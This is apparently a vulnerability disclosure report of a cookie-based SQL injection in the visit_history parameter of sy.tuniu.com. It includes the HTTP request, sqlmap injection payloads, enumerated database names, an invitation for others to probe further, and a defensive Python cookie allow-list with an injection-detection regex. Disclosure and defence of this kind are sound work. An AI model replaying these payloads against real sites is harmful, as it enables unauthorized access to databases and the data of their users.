Browsing the home page and viewing a submitted page shows that the link parameters are also sent in the cookie. Fuzzing that cookie parameter revealed a cookie-based SQL injection vulnerability. This problem is serious and we hope it gets attention.
Detailed description:
GET /zhoubian/leyuan/ HTTP/1.1
Host: sy.tuniu.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://sy.tuniu.com/tours/311094
Cookie: tuniuuser_citycode=MTkwMg%3D%3D; tuniu_channel=region%3D; visit_history=311094; PHPSESSID=aq8r0pudtjl3t61vkss0i563o3
DNT: 1
Cache-Control: max-age=0
Cookie injection vulnerability found in the visit_history=311094 parameter.
sqlmap identified the following injection points with a total of 210 HTTP(s) requests:
---
Place: Cookie
Parameter: visit_history
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: tuniuuser_citycode=MTkwMg%3D%3D; tuniu_channel=Hangzhou%3D; visit_history=311094) AND 4608=4608 AND (9847=9847; PHPSESSID=Beijing
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: tuniuuser_citycode=MTkwMg%3D%3D; tuniu_channel=Hangzhou%3D; visit_history=311094) AND (SELECT 3540 FROM(SELECT COUNT(*),CONCAT(0x3a79756b3a,(SELECT (CASE WHEN (3540=3540) THEN 1 ELSE 0 END),0x3a6878653a,FLOOR(RAND(0)*2)x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)) AND (5085=5085; PHPSESSID=aq8r0pudtjl3t61vkss0i563o3
---
[11:03:27] [INFO] the back-end DBMS is MySQL
Web server operating system: Linux CentOS
Web application technology: PHP 5.3.3, Apache 2.2.15
Back-end DBMS: MySQL 5.0
[11:03:27] [INFO] fetching database names
[11:03:27] [WARNING] the SQL query provided does not return any output
[11:03:27] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
[11:03:27] [INFO] fetching number of databases
[11:03:27] [INFO] retrieved: 3
[11:03:31] [INFO] retrieving the length of query output
[11:03:31] [INFO] retrieved: 18
[11:03:50] [INFO] retrieved: information_schema
[11:03:50] [INFO] retrieving the length of query output
[11:03:50] [INFO] retrieved: 4
[11:03:59] [INFO] retrieved: test
[11:03:59] [INFO] retrieving the length of query output
[11:03:59] [INFO] retrieved: 5
[11:04:09] [INFO] retrieved: tuniu
available databases [3]:
[*] information_schema
[*] test
[*] tuniu
[11:04:10] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 202 times
[11:04:10] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/sy.tuniu.com'
-------------------------------------------------------------
Use sqlmap to obtain database information:
available databases [3]:
[*] information_schema
[*] test
[*] tuniu
I did not go any further. There are many problems; those on WooYun who have time can try again ~~
Solution:
Parameter Filtering
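As an added example (not code from the report or from the site), a defender-side check in Python for the fix named above: it parses the Cookie header from the request shown in the report, allow-lists visit_history to a plain numeric tour id, and flags cookie parameters that carry SQL fragments. The sample headers are constructed from the report's own request and sqlmap payloads; the cookie names are the ones the report shows.

```python
import re
from urllib.parse import unquote

# Constructed sample Cookie headers, modelled on the report's request and on
# the two sqlmap payloads it lists (boolean-based blind and error-based).
BENIGN = ("tuniuuser_citycode=MTkwMg%3D%3D; tuniu_channel=region%3D; "
          "visit_history=311094; PHPSESSID=aq8r0pudtjl3t61vkss0i563o3")
BOOLEAN_BLIND = ("tuniuuser_citycode=MTkwMg%3D%3D; "
                 "visit_history=311094) AND 4608=4608 AND (9847=9847; "
                 "PHPSESSID=aq8r0pudtjl3t61vkss0i563o3")
ERROR_BASED = ("visit_history=311094) AND (SELECT 3540 FROM(SELECT COUNT(*),"
               "CONCAT(0x3a79756b3a,(SELECT (CASE WHEN (3540=3540) THEN 1 ELSE 0 END)),"
               "0x3a6878653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS "
               "GROUP BY x)a) AND (5085=5085")


def parse_cookie_header(header):
    """Split a raw Cookie header into {name: decoded value}.
    Hand-rolled because http.cookies rejects the characters injected values carry,
    so a stdlib parser would silently drop exactly the pair we need to inspect."""
    jar = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")  # split at the first '=' only
        if sep and name:
            jar[name] = unquote(value)
    return jar


# Allow-list: visit_history is a tour id (the Referer shows /tours/311094), so
# only a short run of digits is acceptable. Everything else is rejected outright.
VISIT_HISTORY_OK = re.compile(r"^\d{1,10}$")


def validate_visit_history(jar):
    """Return the int tour id, or None when the cookie is missing or not a bare number."""
    raw = jar.get("visit_history")
    if raw is None or not VISIT_HISTORY_OK.match(raw):
        return None
    return int(raw)


# Detection aid for access logs / a WAF: SQL-shaped content inside cookie values.
# Patterns are taken from the shapes of the sqlmap payloads above.
SQLI_HINTS = re.compile(
    r"(\)\s*(and|or)\b|\bselect\b|\bunion\b|information_schema|0x[0-9a-f]{4,}|--|/\*)",
    re.I,
)


def suspicious_cookie_params(header):
    """Names of cookie parameters whose value contains SQL fragments."""
    return [n for n, v in parse_cookie_header(header).items() if SQLI_HINTS.search(v)]
```

The allow-list is the fix; the detection regex only helps find attempts in logs and is not a substitute for parameterized queries on the server side.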